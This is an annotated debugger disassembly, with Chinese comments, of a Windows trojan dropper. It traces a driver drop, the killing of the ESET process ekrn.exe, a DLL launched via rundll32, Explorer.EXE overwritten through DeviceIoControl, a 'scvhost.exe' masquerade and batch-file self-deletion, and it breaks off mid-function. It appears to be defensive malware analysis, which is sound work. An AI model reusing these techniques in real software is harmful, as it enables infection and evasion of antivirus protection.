00402635 . 8D8424 70020000 lea eax, dword ptr [esp+270]
0040263C . 52 push edx
0040263D . 50 push eax
0040263E . FFD6 call esi
00402640 . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402644 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402649 . 51 push ecx ; |PathBuffer
0040264A . 6A 00 push 0 ; |hModule = NULL
0040264C . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402652 . 8D9424 70020000 lea edx, dword ptr [esp+270]
00402659 . 6A 67 push 67
0040265B . 52 push edx
0040265C . E8 CFF1FFFF call <创建文件> ; 创建文件"C:\WINDOWS\system32\drivers\pcidump.sys"
00402661 . 8D8424 70020000 lea eax, dword ptr [esp+270]
00402668 . 50 push eax
00402669 . E8 22EEFFFF call 00401490 ; 启动服务
0040266E . 83C4 04 add esp, 4
00402671 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
00402678 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040267D . 51 push ecx ; |Buffer
0040267E . FF15 7C104000 call dword ptr [40107C] ; \GetWindowsDirectoryA
00402684 . 8B3D 8C104000 mov edi, dword ptr [40108C] ; kernel32.lstrcpyA
0040268A . 8D5424 10 lea edx, dword ptr [esp+10]
0040268E . 8D8424 74040000 lea eax, dword ptr [esp+474]
00402695 . 52 push edx ; /String2
00402696 . 50 push eax ; |String1
00402697 . FFD7 call edi ; \lstrcpyA
00402699 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
004026A0 . 8D9424 74040000 lea edx, dword ptr [esp+474]
004026A7 . 51 push ecx
004026A8 . 52 push edx
004026A9 . FFD6 call esi
004026AB . 8D4424 18 lea eax, dword ptr [esp+18]
004026AF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026B6 . 50 push eax
004026B7 . 51 push ecx
004026B8 . FFD6 call esi
004026BA . 8D5424 10 lea edx, dword ptr [esp+10]
004026BE . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026C5 . 52 push edx
004026C6 . 50 push eax
004026C7 . FFD7 call edi
004026C9 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004026CD . 8D9424 74080000 lea edx, dword ptr [esp+874]
004026D4 . 51 push ecx
004026D5 . 52 push edx
004026D6 . FFD6 call esi
004026D8 . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026DF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026E6 . 50 push eax
004026E7 . 51 push ecx
004026E8 . E8 63EFFFFF call 00401650 ; 关键call 3 修改gm.dls和explorer.exe
004026ED . 8D9424 78020000 lea edx, dword ptr [esp+278]
004026F4 . 52 push edx
004026F5 . E8 B6EEFFFF call 004015B0 ; 删除驱动文件
004026FA . 83C4 0C add esp, 0C
004026FD . 68 E8030000 push 3E8
00402702 . FFD5 call ebp ; kernel32.Sleep
00402704 . B9 3F000000 mov ecx, 3F
00402709 . 33C0 xor eax, eax
0040270B . 8D7C24 70 lea edi, dword ptr [esp+70]
0040270F . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402714 . F3:AB rep stos dword ptr es:[edi] ; |
00402716 . 66:AB stos word ptr es:[edi] ; |
00402718 . AA stos byte ptr es:[edi] ; |
00402719 . B9 3F000000 mov ecx, 3F ; |
0040271E . 33C0 xor eax, eax ; |
00402720 . 8DBC24 74010000 lea edi, dword ptr [esp+174] ; |
00402727 . C64424 2C 73 mov byte ptr [esp+2C], 73 ; |
0040272C . F3:AB rep stos dword ptr es:[edi] ; |
0040272E . 66:AB stos word ptr es:[edi] ; |
00402730 . AA stos byte ptr es:[edi] ; |
00402731 . 8D4424 74 lea eax, dword ptr [esp+74] ; |
00402735 . C64424 2D 63 mov byte ptr [esp+2D], 63 ; |
0040273A . 50 push eax ; |PathBuffer
0040273B . 6A 00 push 0 ; |hModule = NULL
0040273D . C64424 36 76 mov byte ptr [esp+36], 76 ; |输入scvhost.exe(与004027A2处注释一致;与系统进程svchost.exe仅一字之差)
00402742 . C64424 37 68 mov byte ptr [esp+37], 68 ; |
00402747 . C64424 38 6F mov byte ptr [esp+38], 6F ; |
0040274C . C64424 39 73 mov byte ptr [esp+39], 73 ; |
00402751 . C64424 3A 74 mov byte ptr [esp+3A], 74 ; |
00402756 . C64424 3B 2E mov byte ptr [esp+3B], 2E ; |
0040275B . C64424 3C 65 mov byte ptr [esp+3C], 65 ; |
00402760 . C64424 3D 78 mov byte ptr [esp+3D], 78 ; |
00402765 . C64424 3E 65 mov byte ptr [esp+3E], 65 ; |
0040276A . C64424 3F 00 mov byte ptr [esp+3F], 0 ; |
0040276F . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402775 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040277C . 68 FF000000 push 0FF
00402781 . 51 push ecx
00402782 . FFD3 call ebx
00402784 . 8D9424 70010000 lea edx, dword ptr [esp+170]
0040278B . 68 D4134000 push 004013D4 ; \
00402790 . 52 push edx
00402791 . FFD6 call esi ; kernel32.lstrcatA
00402793 . 8D4424 28 lea eax, dword ptr [esp+28]
00402797 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040279E . 50 push eax ; // "scvhost.exe"
0040279F . 51 push ecx ; "C:\WINDOWS\system32\"
004027A0 . FFD6 call esi
004027A2 . 8D9424 70010000 lea edx, dword ptr [esp+170] ; 把"C:\trojan\trojan\412489_fm01.exe"复制为"C:\WINDOWS\system32\scvhost.exe"
004027A9 . 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004027AB . 8D4424 74 lea eax, dword ptr [esp+74] ; |
004027AF . 52 push edx ; |0012F444 0012F5BC |NewName = "C:\WINDOWS\system32\scvhost.exe"
004027B0 . 50 push eax ; |0012F440 0012F4BC |ExistingName = "C:\trojan\trojan\412489_fm01.exe"
004027B1 . FF15 70104000 call dword ptr [401070] ; \MoveFileExA
004027B7 . 8B35 48104000 mov esi, dword ptr [401048] ; kernel32.lstrcmpiA
004027BD . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
004027C4 . 8D5424 70 lea edx, dword ptr [esp+70]
004027C8 . 51 push ecx ; /String2
004027C9 . 52 push edx ; |String1
004027CA . FFD6 call esi ; \lstrcmpiA
004027CC . 85C0 test eax, eax
004027CE . 74 18 je short 004027E8
004027D0 . 8D8424 74050000 lea eax, dword ptr [esp+574]
004027D7 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004027DB . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
004027DC . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
004027DD . FFD6 call esi ; \lstrcmpiA
004027DF . 85C0 test eax, eax
004027E1 . 74 05 je short 004027E8
004027E3 . E8 88F3FFFF call 00401B70 ; 关键call 4 自删除函数
004027E8 > 5F pop edi
004027E9 . 5E pop esi
004027EA . 5D pop ebp
004027EB . 33C0 xor eax, eax
004027ED . 5B pop ebx
004027EE . 81C4 680B0000 add esp, 0B68
004027F4 . C2 1000 retn 10
关键call 1
00401970 /$ 83EC 58 sub esp, 58
00401973 |. 53 push ebx
00401974 |. B3 63 mov bl, 63
00401976 |. B0 20 mov al, 20
00401978 |. B2 2F mov dl, 2F
0040197A |. B1 65 mov cl, 65
0040197C |. 885C24 04 mov byte ptr [esp+4], bl
......
00401AD1 |. C64424 52 75 mov byte ptr [esp+52], 75
00401AD6 |. 68 D0124000 push 004012D0 ; ekrn.exe
00401ADB |. C64424 57 69 mov byte ptr [esp+57], 69
00401AE0 |. C64424 58 2E mov byte ptr [esp+58], 2E
00401AE5 |. 884C24 59 mov byte ptr [esp+59], cl
00401AE9 |. C64424 5A 78 mov byte ptr [esp+5A], 78
00401AEE |. 884C24 5B mov byte ptr [esp+5B], cl
00401AF2 |. 884424 5C mov byte ptr [esp+5C], al
00401AF6 |. 885424 5D mov byte ptr [esp+5D], dl
00401AFA |. C64424 5E 66 mov byte ptr [esp+5E], 66
00401AFF |. E8 ECFDFFFF call 004018F0 ; 关闭指定进程
00401B04 |. 83C4 04 add esp, 4
00401B07 |. 85C0 test eax, eax
00401B09 |. 5B pop ebx
00401B0A |. 74 5C je short 00401B68
00401B0C |. 6A 00 push 0
00401B0E |. 6A 00 push 0
00401B10 |. 8D4424 08 lea eax, dword ptr [esp+8]
00401B14 |. 68 E4104000 push 004010E4
00401B19 |. 50 push eax
00401B1A |. 68 C8124000 push 004012C8 ; open
00401B1F |. 6A 00 push 0
00401B21 |. E8 1AF9FFFF call <动态获得函数地址并运行文件>
00401B26 |. 6A 00 push 0
00401B28 |. 6A 00 push 0
00401B2A |. 8D4C24 38 lea ecx, dword ptr [esp+38]
00401B2E |. 68 E4104000 push 004010E4
00401B33 |. 51 push ecx
00401B34 |. 68 C8124000 push 004012C8 ; open
00401B39 |. 6A 00 push 0
00401B3B |. E8 00F9FFFF call <动态获得函数地址并运行文件>
00401B40 |. 6A 00 push 0
00401B42 |. 6A 00 push 0
00401B44 |. 8D5424 70 lea edx, dword ptr [esp+70]
00401B48 |. 68 E4104000 push 004010E4
00401B4D |. 52 push edx
00401B4E |. 68 C8124000 push 004012C8 ; open
00401B53 |. 6A 00 push 0
00401B55 |. E8 E6F8FFFF call <动态获得函数地址并运行文件>
00401B5A |. 83C4 48 add esp, 48
00401B5D |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
00401B62 |. FF15 9C104000 call dword ptr [40109C] ; \Sleep
00401B68 |> 83C4 58 add esp, 58
00401B6B \. C3 retn
关键call 2
00401CE0 /$ 81EC 54030000 sub esp, 354
00401CE6 |. 53 push ebx
00401CE7 |. 56 push esi
00401CE8 |. 57 push edi
00401CE9 |. B9 3F000000 mov ecx, 3F
00401CEE |. 33C0 xor eax, eax
00401CF0 |. 8D7C24 60 lea edi, dword ptr [esp+60]
00401CF4 |. F3:AB rep stos dword ptr es:[edi]
00401CF6 |. 66:AB stos word ptr es:[edi]
00401CF8 |. AA stos byte ptr es:[edi]
00401CF9 |. B9 3F000000 mov ecx, 3F
00401CFE |. 33C0 xor eax, eax
00401D00 |. 8DBC24 60020000 lea edi, dword ptr [esp+260]
00401D07 |. F3:AB rep stos dword ptr es:[edi]
00401D09 |. 66:AB stos word ptr es:[edi]
00401D0B |. AA stos byte ptr es:[edi]
00401D0C |. B9 3F000000 mov ecx, 3F
00401D11 |. 33C0 xor eax, eax
00401D13 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D1A |. F3:AB rep stos dword ptr es:[edi]
00401D1C |. 66:AB stos word ptr es:[edi]
00401D1E |. AA stos byte ptr es:[edi]
00401D1F |. FF15 68104000 call dword ptr [401068] ; [GetTickCount
00401D25 |. 50 push eax ; /<%d>
00401D26 |. 8D8424 64020000 lea eax, dword ptr [esp+264] ; |
00401D2D |. 68 54134000 push 00401354 ; |%d.dll
00401D32 |. 50 push eax ; |s
00401D33 |. FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
00401D39 |. 83C4 0C add esp, 0C ; 44810500.dll
00401D3C |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D40 |. 51 push ecx ; /Buffer
00401D41 |. 68 FF000000 push 0FF ; |BufSize = FF (255.)
00401D46 |. FF15 AC104000 call dword ptr [4010AC] ; \GetTempPathA
00401D4C |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00401D52 |. 8D9424 60020000 lea edx, dword ptr [esp+260]
00401D59 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401D5D |. 52 push edx ; /StringToAdd
00401D5E |. 50 push eax ; |ConcatString
00401D5F |. FFD6 call esi ; \lstrcatA
00401D61 |. 8D4C24 60 lea ecx, dword ptr [esp+60] ; //连接字符串C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll
00401D65 |. 6A 66 push 66
00401D67 |. 51 push ecx
00401D68 |. E8 C3FAFFFF call <创建文件> //创建 44810500.dll文件
00401D6D |. 8B1D 8C104000 mov ebx, dword ptr [40108C] ; kernel32.lstrcpyA
00401D73 |. 8D5424 60 lea edx, dword ptr [esp+60]
00401D77 |. 8D8424 60010000 lea eax, dword ptr [esp+160]
00401D7E |. 52 push edx ; /String2
00401D7F |. 50 push eax ; |String1
00401D80 |. FFD3 call ebx ; \lstrcpyA
00401D82 |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D86 |. 68 48134000 push 00401348 ; testall
00401D8B |. 51 push ecx
00401D8C |. FFD6 call esi
00401D8E |. B9 3F000000 mov ecx, 3F
00401D93 |. 33C0 xor eax, eax
00401D95 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D9C |. 8D9424 60010000 lea edx, dword ptr [esp+160]
00401DA3 |. F3:AB rep stos dword ptr es:[edi]
00401DA5 |. 66:AB stos word ptr es:[edi]
00401DA7 |. 68 38134000 push 00401338 ; rundll32.exe
00401DAC |. 52 push edx
00401DAD |. AA stos byte ptr es:[edi]
00401DAE |. FFD3 call ebx ; kernel32.lstrcpyA
00401DB0 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401DB4 |. 8D8C24 60010000 lea ecx, dword ptr [esp+160]
00401DBB |. 50 push eax
00401DBC |. 51 push ecx
00401DBD |. FFD6 call esi
00401DBF |. B9 11000000 mov ecx, 11
00401DC4 |. 33C0 xor eax, eax
00401DC6 |. 8D7C24 1C lea edi, dword ptr [esp+1C]
00401DCA |. 8D5424 0C lea edx, dword ptr [esp+C]
00401DCE |. F3:AB rep stos dword ptr es:[edi]
00401DD0 |. 8D4C24 1C lea ecx, dword ptr [esp+1C]
00401DD4 |. 52 push edx ; /pProcessInfo
00401DD5 |. 51 push ecx ; |pStartupInfo
00401DD6 |. C74424 24 44000000 mov dword ptr [esp+24], 44 ; |
00401DDE |. 894424 50 mov dword ptr [esp+50], eax ; |
00401DE2 |. 66:C74424 54 0500 mov word ptr [esp+54], 5 ; |
00401DE9 |. 894424 60 mov dword ptr [esp+60], eax ; |
00401DED |. 894424 64 mov dword ptr [esp+64], eax ; |
00401DF1 |. 50 push eax ; |CurrentDir => NULL
00401DF2 |. 50 push eax ; |pEnvironment => NULL
00401DF3 |. 50 push eax ; |CreationFlags => 0
00401DF4 |. 6A 01 push 1 ; |InheritHandles = TRUE
00401DF6 |. 50 push eax ; |pThreadSecurity => NULL
00401DF7 |. 8D9424 7C010000 lea edx, dword ptr [esp+17C] ; |
00401DFE |. 50 push eax ; |pProcessSecurity => NULL
00401DFF |. 52 push edx ; |CommandLine
00401E00 |. 50 push eax ; |ModuleFileName => NULL
00401E01 |. FF15 60104000 call dword ptr [401060] ; \CreateProcessA
00401E07 |. 5F pop edi ; 命令行加载该dll CommandLine = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall"
00401E08 |. 5E pop esi
00401E09 |. 85C0 test eax, eax
00401E0B |. 5B pop ebx
00401E0C |. 74 18 je short 00401E26
00401E0E |. 8B4424 04 mov eax, dword ptr [esp+4]
00401E12 |. 50 push eax ; /hObject
00401E13 |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401E19 |. 8B4C24 00 mov ecx, dword ptr [esp]
00401E1D |. 6A FF push -1 ; /Timeout = INFINITE
00401E1F |. 51 push ecx ; |hObject
00401E20 |. FF15 5C104000 call dword ptr [40105C] ; \WaitForSingleObject
00401E26 |> 8D9424 54010000 lea edx, dword ptr [esp+154]
00401E2D |. 52 push edx ; //FileName = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall"(传给DeleteFileA的是整条命令行而不是DLL路径,删除很可能失败,DLL会残留在临时目录,可作为取证线索)
00401E2E |. FF15 A0104000 call dword ptr [4010A0] ; \DeleteFileA
00401E34 |. 81C4 54030000 add esp, 354
00401E3A \. C3 retn
关键call 3
00401650 /$ 81EC 30020000 sub esp, 230
00401656 |. 8A0D C0124000 mov cl, byte ptr [4012C0]
0040165C |. B0 5C mov al, 5C
0040165E |. 884424 00 mov byte ptr [esp], al
00401662 |. 884424 01 mov byte ptr [esp+1], al
00401666 |. 884424 03 mov byte ptr [esp+3], al
0040166A |. B0 70 mov al, 70
0040166C |. 884424 04 mov byte ptr [esp+4], al
00401670 |. 884424 0A mov byte ptr [esp+A], al
00401674 |. A1 BC124000 mov eax, dword ptr [4012BC]
00401679 |. 57 push edi
0040167A |. 894424 1C mov dword ptr [esp+1C], eax
0040167E |. 884C24 20 mov byte ptr [esp+20], cl
00401682 |. B9 3F000000 mov ecx, 3F
00401687 |. 33C0 xor eax, eax
00401689 |. 8D7C24 34 lea edi, dword ptr [esp+34]
0040168D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040168F |. F3:AB rep stos dword ptr es:[edi] ; |
00401691 |. 66:AB stos word ptr es:[edi] ; |
00401693 |. AA stos byte ptr es:[edi] ; |
00401694 |. B9 3F000000 mov ecx, 3F ; |
00401699 |. 33C0 xor eax, eax ; |
0040169B |. 8DBC24 38010000 lea edi, dword ptr [esp+138] ; |
004016A2 |. 68 80000000 push 80 ; |Attributes = NORMAL
004016A7 |. F3:AB rep stos dword ptr es:[edi] ; |
004016A9 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004016AB |. 6A 00 push 0 ; |pSecurity = NULL
004016AD |. 66:AB stos word ptr es:[edi] ; |
004016AF |. 6A 00 push 0 ; |ShareMode = 0
004016B1 |. 8D5424 18 lea edx, dword ptr [esp+18] ; |
004016B5 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004016BA |. 52 push edx ; |FileName
004016BB |. C64424 22 2E mov byte ptr [esp+22], 2E ; |
004016C0 |. C64424 25 63 mov byte ptr [esp+25], 63 ; |
004016C5 |. C64424 26 69 mov byte ptr [esp+26], 69 ; |
004016CA |. C64424 27 64 mov byte ptr [esp+27], 64 ; |
004016CF |. C64424 28 75 mov byte ptr [esp+28], 75 ; |
004016D4 |. C64424 29 6D mov byte ptr [esp+29], 6D ; |
004016D9 |. C64424 2B 00 mov byte ptr [esp+2B], 0 ; |
004016DE |. AA stos byte ptr es:[edi] ; |
004016DF |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
004016E5 |. 8BF8 mov edi, eax
004016E7 |. 85FF test edi, edi
004016E9 |. 0F84 2D010000 je 0040181C
004016EF |. A0 78124000 mov al, byte ptr [401278]
004016F4 |. 53 push ebx
004016F5 |. 55 push ebp
004016F6 |. 8BAC24 40020000 mov ebp, dword ptr [esp+240]
004016FD |. 56 push esi
004016FE |. 8B35 8C104000 mov esi, dword ptr [40108C] ; kernel32.lstrcpyA
00401704 |. 84C0 test al, al
00401706 |. 0F84 A8000000 je 004017B4
0040170C |. 8B0D B0124000 mov ecx, dword ptr [4012B0]
00401712 |. A1 AC124000 mov eax, dword ptr [4012AC]
00401717 |. 8B15 B4124000 mov edx, dword ptr [4012B4]
0040171D |. 894C24 34 mov dword ptr [esp+34], ecx
00401721 |. 894424 30 mov dword ptr [esp+30], eax
00401725 |. A1 B8124000 mov eax, dword ptr [4012B8]
0040172A |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
00401731 |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
00401736 |. 51 push ecx ; |Buffer
00401737 |. 895424 40 mov dword ptr [esp+40], edx ; |
0040173B |. 894424 44 mov dword ptr [esp+44], eax ; |
0040173F |. FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00401745 |. 8D5424 28 lea edx, dword ptr [esp+28]
00401749 |. 8D4424 40 lea eax, dword ptr [esp+40]
0040174D |. 52 push edx ; /String2
0040174E |. 50 push eax ; |String1
0040174F |. FFD6 call esi ; \lstrcpyA
00401751 |. 8B1D 94104000 mov ebx, dword ptr [401094] ; kernel32.lstrcatA
00401757 |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
0040175E |. 8D5424 40 lea edx, dword ptr [esp+40]
00401762 |. 51 push ecx ; /StringToAdd
00401763 |. 52 push edx ; |ConcatString
00401764 |. FFD3 call ebx ; \lstrcatA
00401766 |. 8D4424 30 lea eax, dword ptr [esp+30]
0040176A |. 8D4C24 40 lea ecx, dword ptr [esp+40]
0040176E |. 50 push eax ; /StringToAdd
0040176F |. 51 push ecx ; |ConcatString
00401770 |. FFD3 call ebx ; \lstrcatA
00401772 |. 55 push ebp ; /String2
00401773 |. 68 E8104000 push 004010E8 ; |123321
00401778 |. FFD6 call esi ; \lstrcpyA
0040177A |. 8D5424 40 lea edx, dword ptr [esp+40]
0040177E |. 52 push edx ; /String2
0040177F |. 68 B0114000 push 004011B0 ; |String1 = 412489_f.004011B0
00401784 |. FFD6 call esi ; \lstrcpyA
00401786 |. 8D4424 1C lea eax, dword ptr [esp+1C]
0040178A |. 6A 00 push 0 ; /pOverlapped = NULL
0040178C |. 50 push eax ; |pBytesReturned
0040178D |. 6A 00 push 0 ; |OutBufferSize = 0
0040178F |. 6A 00 push 0 ; |OutBuffer = NULL
00401791 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
00401795 |. 6A 08 push 8 ; |InBufferSize = 8
00401797 |. 51 push ecx ; |InBuffer
00401798 |. 68 14202200 push 222014 ; |IoControlCode = 222014
0040179D |. 57 push edi ; |hDevice
0040179E |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |123321
004017A6 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; |C:\WINDOWS\system32\drivers\gm.dls
004017AE |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl
004017B4 |> 8B1D 9C104000 mov ebx, dword ptr [40109C] ; kernel32.Sleep
004017BA |. 68 B80B0000 push 0BB8 ; /Timeout = 3000. ms
004017BF |. FFD3 call ebx ; \Sleep
004017C1 |. 8B9424 48020000 mov edx, dword ptr [esp+248]
004017C8 |. 52 push edx
004017C9 |. 68 E8104000 push 004010E8 ; 123321
004017CE |. FFD6 call esi
004017D0 |. 55 push ebp
004017D1 |. 68 B0114000 push 004011B0 ; ASCII "\??\C:\WINDOWS\Explorer.EXE"
004017D6 |. FFD6 call esi
004017D8 |. 8D4424 1C lea eax, dword ptr [esp+1C]
004017DC |. 6A 00 push 0 ; /pOverlapped = NULL
004017DE |. 50 push eax ; |pBytesReturned
004017DF |. 6A 00 push 0 ; |OutBufferSize = 0
004017E1 |. 6A 00 push 0 ; |OutBuffer = NULL
004017E3 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
004017E7 |. 6A 08 push 8 ; |InBufferSize = 8
004017E9 |. 51 push ecx ; |InBuffer
004017EA |. 68 14202200 push 222014 ; |IoControlCode = 222014
004017EF |. 57 push edi ; |hDevice
004017F0 |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |123321
004017F8 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; | |ASCII "\??\C:\WINDOWS\Explorer.EXE"
00401800 |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl
00401806 |. 68 B80B0000 push 0BB8 ; 用DeviceIoControl与驱动程序进行通信,包括读和写两种操作
0040180B |. 33F6 xor esi, esi
0040180D |. FFD3 call ebx
0040180F |. 8BC6 mov eax, esi
00401811 |. 5E pop esi
00401812 |. 5D pop ebp
00401813 |. 5B pop ebx
00401814 |. 5F pop edi
00401815 |. 81C4 30020000 add esp, 230
0040181B |. C3 retn
0040181C |> 8B4424 10 mov eax, dword ptr [esp+10]
00401820 |. 5F pop edi
00401821 |. 81C4 30020000 add esp, 230
00401827 \. C3 retn
关键call 4
; ---------------------------------------------------------------------------
; self_delete_via_bat()   ["关键call 4" of the dropper; never returns]
; Builds a 800h-byte, zero-filled batch script in the stack buffer at
; [esp+11C] and the 10-byte file name "kl78a.bat" (assembled at [esp+8]
; from [40132C]/[401330]/[401334]), writes the script, launches it hidden
; and calls ExitProcess. The script as built (see the dump below):
;   @echo off
;   @echo kklfa>>11.ca   (10 times - presumably a crude delay so this
;                         process has exited before its file is deleted)
;   @del 11.ca
;   @del "<own path from GetModuleFileNameA>"
;   @del kl78a.bat
;   @exit
; WriteFile always writes the full 800h buffer, so the .bat on disk carries
; NUL padding after "@exit". CreateFileA is given the bare relative name, so
; the script lands in the current working directory; 11.ca and kl78a.bat
; are the on-disk leftovers if the script is interrupted.
; ShellExecuteA is reached through the dynamic resolver below with
; (hwnd=NULL, "open", "kl78a.bat", params at 004010E4, dir=NULL,
; nShowCmd=0=SW_HIDE); the caller removes the six cdecl arguments.
; ---------------------------------------------------------------------------
00401B70 /$ 81EC 14090000 sub esp, 914
00401B76 |. 56 push esi
00401B77 |. 57 push edi
00401B78 |. B9 40000000 mov ecx, 40 ; zero 104h bytes at [esp+18]: own-path buffer
00401B7D |. 33C0 xor eax, eax
00401B7F |. 8D7C24 19 lea edi, dword ptr [esp+19]
00401B83 |. C64424 18 00 mov byte ptr [esp+18], 0
00401B88 |. F3:AB rep stos dword ptr es:[edi]
00401B8A |. 66:AB stos word ptr es:[edi]
00401B8C |. AA stos byte ptr es:[edi]
00401B8D |. B9 FF010000 mov ecx, 1FF ; zero 800h bytes at [esp+11C]: script buffer
00401B92 |. 33C0 xor eax, eax
00401B94 |. 8DBC24 1D010000 lea edi, dword ptr [esp+11D]
00401B9B |. C68424 1C010000 00 mov byte ptr [esp+11C], 0
00401BA3 |. F3:AB rep stos dword ptr es:[edi]
00401BA5 |. 66:AB stos word ptr es:[edi]
00401BA7 |. 8B0D 30134000 mov ecx, dword ptr [401330] ; bytes 4..7 of "kl78a.bat"
00401BAD |. 66:8B15 34134000 mov dx, word ptr [401334] ; bytes 8..9 ("t", NUL)
00401BB4 |. AA stos byte ptr es:[edi]
00401BB5 |. A1 2C134000 mov eax, dword ptr [40132C] ; bytes 0..3 of "kl78a.bat"
00401BBA |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401BBF |. 894424 0C mov dword ptr [esp+C], eax ; | = [esp+8] before the push: start of the file name
00401BC3 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; |
00401BC7 |. 50 push eax ; |PathBuffer
00401BC8 |. 6A 00 push 0 ; |hModule = NULL
00401BCA |. 894C24 18 mov dword ptr [esp+18], ecx ; |
00401BCE |. 66:895424 1C mov word ptr [esp+1C], dx ; |
00401BD3 |. FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA  (path of this executable)
00401BD9 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401BE0 |. 68 20134000 push 00401320 ; /@echo off\n\rkl78a.bat  (String2 = "@echo off\n\r"; the debugger also shows the adjacent string)
00401BE5 |. 51 push ecx ; |String1
00401BE6 |. FF15 8C104000 call dword ptr [40108C] ; \lstrcpyA
00401BEC |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00401BF2 |. BF 0A000000 mov edi, 0A ; edi = 10 iterations
00401BF7 |> 8D9424 1C010000 /lea edx, dword ptr [esp+11C]
00401BFE |. 68 08134000 |push 00401308 ; @echo kklfa>>11.ca\n\r
00401C03 |. 52 |push edx
00401C04 |. FFD6 |call esi ; lstrcatA
00401C06 |. 4F |dec edi
00401C07 |.^ 75 EE \jnz short 00401BF7 ; append the echo line 10 times
00401C09 |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C10 |. 68 F8124000 push 004012F8 ; @del 11.ca\n\r
00401C15 |. 50 push eax
00401C16 |. FFD6 call esi
00401C18 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C1F |. 68 F0124000 push 004012F0 ; @del "
00401C24 |. 51 push ecx
00401C25 |. FFD6 call esi
00401C27 |. 8D5424 18 lea edx, dword ptr [esp+18] ; own path from GetModuleFileNameA
00401C2B |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C32 |. 52 push edx
00401C33 |. 50 push eax
00401C34 |. FFD6 call esi
00401C36 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C3D |. 68 EC124000 push 004012EC ; "\n\r@del "  (closing quote; the debugger also shows the adjacent string)
00401C42 |. 51 push ecx
00401C43 |. FFD6 call esi
00401C45 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C4C |. 68 E4124000 push 004012E4 ; @del  (the "\n\r@del " string, cf. the dump below)
00401C51 |. 52 push edx
00401C52 |. FFD6 call esi
00401C54 |. 8D4424 08 lea eax, dword ptr [esp+8] ; "kl78a.bat": the script deletes itself
00401C58 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C5F |. 50 push eax
00401C60 |. 51 push ecx
00401C61 |. FFD6 call esi
00401C63 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C6A |. 68 DC124000 push 004012DC ; \n\r@exit@del
00401C6F |. 52 push edx
00401C70 |. FFD6 call esi
00401C72 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401C74 |. 6A 00 push 0 ; |Attributes = 0
00401C76 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401C78 |. 6A 00 push 0 ; |pSecurity = NULL
00401C7A |. 6A 00 push 0 ; |ShareMode = 0
00401C7C |. 8D4424 1C lea eax, dword ptr [esp+1C] ; |
00401C80 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00401C85 |. 50 push eax ; |0012EB10 0012EB34 |FileName = "kl78a.bat"  (relative name: current working directory)
00401C86 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA  (handle is not validated)
00401C8C |. 8D4C24 14 lea ecx, dword ptr [esp+14]
00401C90 |. 6A 00 push 0 ; /pOverlapped = NULL
00401C92 |. 51 push ecx ; |pBytesWritten
00401C93 |. 8D9424 24010000 lea edx, dword ptr [esp+124] ; |
00401C9A |. 8BF0 mov esi, eax ; |esi = hFile (lstrcatA pointer no longer needed)
